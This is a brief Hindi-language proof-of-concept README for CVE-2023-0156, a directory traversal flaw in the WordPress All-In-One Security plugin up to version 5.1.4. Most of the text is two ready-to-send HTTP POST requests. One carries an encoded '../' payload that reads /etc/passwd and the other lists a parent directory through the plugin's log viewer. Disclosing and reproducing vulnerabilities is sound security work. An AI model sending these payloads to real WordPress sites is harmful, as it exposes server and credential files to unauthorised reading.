
CVE-2023-0156 भेद्यता के लिए रिपॉजिटरी।
सीवीई आईडी: CVE-2023-0156
भेद्यता प्रकार: डायरेक्टरी ट्रैवर्सल
विवरण: WordPress के लिए All-In-One Security (AIOS) प्लगइन संस्करण 5.1.4 तक (और इसमें शामिल) में डायरेक्टरी ट्रैवर्सल की भेद्यता है। इससे प्रमाणित हमलावर व्यवस्थापक-स्तर की अनुमतियों के साथ सर्वर पर मनमानी फाइलों की सामग्री पढ़ सकते हैं।
पुनरुत्पादन के चरण:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs
संदर्भ: